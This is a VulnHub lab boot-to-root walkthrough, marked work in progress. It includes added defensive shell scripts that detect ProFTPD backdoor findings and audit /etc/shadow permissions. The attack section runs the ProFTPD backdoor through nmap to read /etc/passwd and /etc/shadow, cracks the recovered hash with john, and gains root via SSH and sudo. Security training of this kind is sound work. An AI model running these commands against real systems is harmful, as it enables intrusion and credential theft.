Basic Pentesting: 1 - Boot-to-Root Walkthrough
Objective
Explore multiple remote vulnerabilities and multiple privilege escalation vectors to gain access to the target host and obtain root privileges on it.
Source: [VulnHub.com]
Status: [Work in progress]
Methodology
Discovery
# Nmap 7.60 scan initiated Tue Apr 3 07:31:41 2018 as: nmap -O -sT -sV -p- -T5 -oN nmap.txt 192.168.56.102
Nmap scan report for 192.168.56.102
Host is up (0.00088s latency).
Not shown: 65532 closed ports
PORT STATE SERVICE VERSION
21/tcp open ftp ProFTPD 1.3.3c
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
MAC Address: 08:00:27:14:06:50 (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.8
Network Distance: 1 hop
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Tue Apr 3 07:32:08 2018 -- 1 IP address (1 host up) scanned in 26.77 seconds
Port 21 / ProFTPD 1.3.3c looks interesting. ProFTPD 1.3 is known to be prone to RCE, so let's go for the low-hanging fruit first.
Entry Point #1 - Port 21 (FTP)
Tools: nmap
# Nmap 7.60 scan initiated Tue Apr 3 07:33:26 2018 as: nmap -p 21 --script ftp* -oN nmap_ftp.txt 192.168.56.102
Nmap scan report for 192.168.56.102
Host is up (0.00033s latency).
PORT STATE SERVICE
21/tcp open ftp
| ftp-brute:
| Accounts: No valid accounts found
|_ Statistics: Performed 8420 guesses in 608 seconds, average tps: 13.5
| ftp-proftpd-backdoor:
| This installation has been backdoored.
| Command: id
|_ Results: uid=0(root) gid=0(root) groups=0(root),65534(nogroup)
MAC Address: 08:00:27:14:06:50 (Oracle VirtualBox virtual NIC)
# Nmap done at Tue Apr 3 07:43:48 2018 -- 1 IP address (1 host up) scanned in 621.71 seconds
Voila! We can haz root! Let's try the exploit
root@kali:~/Desktop/Basic_Pentesting_1# nmap --script ftp-proftpd-backdoor --script-args 'cmd=cat /etc/passwd' -p 21 192.168.56.102 |grep "/bin/bash"
| Results: root:x:0:0:root:/root:/bin/bash
| marlinspike:x:1000:1000:marlinspike,,,:/home/marlinspike:/bin/bash
root@kali:~/Desktop/Basic_Pentesting_1# nmap --script ftp-proftpd-backdoor --script-args 'cmd=cat /etc/shadow' -p 21 192.168.56.102 |grep -E "(root|marlinspike)"
| Results: root:!:17484:0:99999:7:::
| marlinspike:$6$wQb5nV3T$xB2WO/jOkbn4t1RUILrckw69LR/0EMtUbFFCYpM3MUHVmtyYW9.ov/aszTpWhLaC2x6Fvy5tpUUxQbUhCKbl4/:17484:0:99999:7:::
root@kali:~/Desktop/Basic_Pentesting_1# echo 'marlinspike:$6$wQb5nV3T$xB2WO/jOkbn4t1RUILrckw69LR/0EMtUbFFCYpM3MUHVmtyYW9.ov/aszTpWhLaC2x6Fvy5tpUUxQbUhCKbl4/' > john.txt
root@kali:~/Desktop/Basic_Pentesting_1# john john.txt
Warning: detected hash type "sha512crypt", but the string is also recognized as "crypt"
Use the "--format=crypt" option to force loading these as that type instead
Using default input encoding: UTF-8
Loaded 1 password hash (sha512crypt, crypt(3) $6$ [SHA512 128/128 AVX 2x])
Press 'q' or Ctrl-C to abort, almost any other key for status
marlinspike (marlinspike)
1g 0:00:00:00 DONE 1/3 (2018-04-03 08:08) 7.142g/s 57.14p/s 57.14c/s 57.14C/s marlinspike..marlinspikes
Use the "--show" option to display all of the cracked passwords reliably
Session completed
root@kali:~/Desktop/Basic_Pentesting_1# ssh marlinspike@vtcsec
The authenticity of host 'vtcsec (192.168.56.102)' can't be established.
ECDSA key fingerprint is SHA256:VpmqtJLBtzleV/ibg84tX0hax9+PC3nojkEOPOVhdJU.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added 'vtcsec,192.168.56.102' (ECDSA) to the list of known hosts.
marlinspike@vtcsec's password:
Welcome to Ubuntu 16.04.3 LTS (GNU/Linux 4.10.0-28-generic x86_64)
......
marlinspike@vtcsec:~$
marlinspike@vtcsec:~$ sudo -l
[sudo] password for marlinspike:
Matching Defaults entries for marlinspike on vtcsec:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User marlinspike may run the following commands on vtcsec:
(ALL : ALL) ALL
marlinspike@vtcsec:~$ sudo su -
root@vtcsec:~#
We have root!
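For the defensive side of this finding, the following added example (not part of the original walkthrough) sweeps saved Nmap normal-format (-oN) output for a positive ftp-proftpd-backdoor result and prints each affected host and port. The function names and the second, clean host in the sample are constructed for illustration.

```shell
#!/bin/sh
# Added example: triage saved `nmap -oN` output for positive
# ftp-proftpd-backdoor results. Prints "host port/proto" per finding.
# Usage: find_backdoored_ftp nmap_ftp.txt [more files...]  (or pipe on stdin)
find_backdoored_ftp() {
    awk '
        # New host block: remember the address, reset per-port state.
        /^Nmap scan report for / {
            host = $NF; gsub(/[()]/, "", host); port = ""; hit = 0; next
        }
        # Port table row such as "21/tcp open ftp".
        /^[0-9]+\/(tcp|udp)[ \t]/ { port = $1; hit = 0; next }
        # Header of the script block we care about.
        /^\|[_ ]? *ftp-proftpd-backdoor:/ { hit = 1; next }
        # Header of any other script block ends ours.
        /^\|[_ ]? *[a-z0-9-]+: *$/ { hit = 0; next }
        # Line the script reports for a backdoored server (as in the scan above).
        hit && /This installation has been backdoored/ {
            print host, port; hit = 0
        }
    ' "$@"
}

# Constructed sample: the first host mirrors the scan above, the second is clean.
sample_scan() {
    cat <<'EOF'
Nmap scan report for 192.168.56.102
Host is up (0.00033s latency).
PORT STATE SERVICE
21/tcp open ftp
| ftp-brute:
| Accounts: No valid accounts found
|_ Statistics: Performed 8420 guesses in 608 seconds, average tps: 13.5
| ftp-proftpd-backdoor:
| This installation has been backdoored.
| Command: id
|_ Results: uid=0(root) gid=0(root) groups=0(root),65534(nogroup)
Nmap scan report for clean.example (192.0.2.10)
PORT STATE SERVICE
21/tcp open ftp
| ftp-brute:
|_ Accounts: No valid accounts found
EOF
}

sample_scan | find_backdoored_ftp
```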
Entry Point #2 - Port 80 (HTTP)
Tools: nmap, nc
- Nikto v2.1.6/2.1.5
+ Target Host: 192.168.56.103
+ Target Port: 80
+ GET Server leaks inodes via ETags, header found with file /, fields: 0xb1 0x55e1c7758dcdb
+ GET The anti-clickjacking X-Frame-Options header is not present.
+ GET The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ GET The X-Content-Type-Options header is not set.
+ OPTIONS Allowed HTTP Methods: POST, OPTIONS, GET, HEAD
+ GET Uncommon header 'link' found, with contents: <http://vtcsec/secret/index.php/wp-json/>; rel="https://api.w.org/"
+ OSVDB-3092: GET /secret/: This might be interesting...
+ OSVDB-3233: GET /icons/README: Apache default file found.
Two things pop out right away:
- Possible WordPress installation
- 'vtcsec' hostname
<< to be continued >>
Recommendations
Appendix A: Vulnerability Detail and Mitigation
Rating | High |
Description | xxxxxx |
Impact | xxxxx |
Remediation | xxxxx |
Rating | High |
Description | Unix file permissions for /etc/shadow are incorrect. |
Impact | Allows any user with a shell to read this file and extract password hashes, which can then be passed to a password-cracking utility to recover user credentials. |
Remediation | Set the Unix file permissions for /etc/shadow to "600" and change ownership to root:root. |
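
A check for the remediation in the last finding, as an added example (not part of the original report): it compares a file's mode and ownership with the stated target of 600 and root:root. The function name and its optional arguments are assumptions, and it relies on GNU stat.

```shell
#!/bin/sh
# Added example: audit a shadow-style file against the remediation above.
# Usage: audit_shadow_perms FILE [MAX_MODE] [OWNER:GROUP]
# Defaults (600, root:root) are the values stated in the finding.
# Assumes GNU coreutils `stat -c`. Returns 0 = compliant, 1 = finding, 2 = error.
audit_shadow_perms() {
    file=$1; max_mode=${2:-600}; want_owner=${3:-root:root}
    rc=0
    mode=$(stat -c '%a' "$file") || return 2
    owner=$(stat -c '%U:%G' "$file") || return 2

    # Permission bits set on the file but absent from the allowed mask.
    extra=$(( 0$mode & ~0$max_mode & 07777 ))
    if [ "$extra" -ne 0 ]; then
        printf 'FAIL %s: mode %s exceeds %s (extra bits %04o)\n' \
            "$file" "$mode" "$max_mode" "$extra"
        rc=1
    fi
    # World-readable is the case the Impact row describes: any local user
    # can copy the hashes.
    if [ $(( 0$mode & 0004 )) -ne 0 ]; then
        printf 'FAIL %s: readable by every local user\n' "$file"
        rc=1
    fi
    if [ "$owner" != "$want_owner" ]; then
        printf 'FAIL %s: owner %s, expected %s\n' "$file" "$owner" "$want_owner"
        rc=1
    fi
    [ "$rc" -eq 0 ] && printf 'OK   %s: mode %s owner %s\n' "$file" "$mode" "$owner"
    return "$rc"
}

# Constructed demo on a temporary file so it runs unprivileged; the owner is
# passed explicitly for that reason. On a real host: audit_shadow_perms /etc/shadow
demo=$(mktemp)
demo_owner=$(stat -c '%U:%G' "$demo")
chmod 644 "$demo"
audit_shadow_perms "$demo" 600 "$demo_owner" || true   # world-readable: FAIL
chmod 600 "$demo"
audit_shadow_perms "$demo" 600 "$demo_owner" || true   # corrected: OK
rm -f "$demo"
```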